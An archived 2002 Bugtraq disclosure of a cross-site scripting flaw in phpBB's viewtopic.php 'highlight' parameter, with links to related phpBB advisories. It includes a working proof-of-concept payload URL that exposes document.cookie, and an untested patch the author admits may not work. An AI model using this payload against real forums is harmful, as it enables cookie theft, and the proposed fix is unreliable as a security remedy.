XSS bug in phpBB

From: Arab VieruZ (arabviersus@hotmail.com)
Date: 11/18/02

Next message: Peter Watkins: "Re: When scrubbing secrets in memory doesn't work"

Previous message: Dan Kaminsky: "Paketto Keiretsu 1.0"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: 18 Nov 2002 12:33:41 -0000
From: Arab VieruZ <arabviersus@hotmail.com>
To: bugtraq@securityfocus.com

('binary' encoding is not supported, stored as-is)

Vulnerable systems:
The Last ver

Exploit:
http://phpbb.com/phpBB/viewtopic.php?
t=17071&highlight=">"<Scr*ipt>javascript:alert(document.cookie)</Scr*ipt>

(without "*")

Solution:
i think that will work , but im not sure

open viewtopic.php and put this code

$highlight = htmlspecialchars($highlight);
$highlight = PREG_Replace("/[A-Z&.;:()~!@#$%^''*\{\}\/]/i", "",
$highlight);

Next message: Peter Watkins: "Re: When scrubbing secrets in memory doesn't work"
Previous message: Dan Kaminsky: "Paketto Keiretsu 1.0"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

[Hat-Squad] phpBB search_id injection exploit
... ('binary' encoding is not supported, ... It will return MD5 password hash of specified user as [highlight] variable for viewtopic.php in search results page. ...
(Bugtraq)
PHP BB bug
... ('binary' encoding is not supported, ... i dont know if my foundation is acceptable or not but here we go i post it... ... when u right an SQL query in the highlight section of the PHPBB u'll get all of the page highlighted ...
(Bugtraq)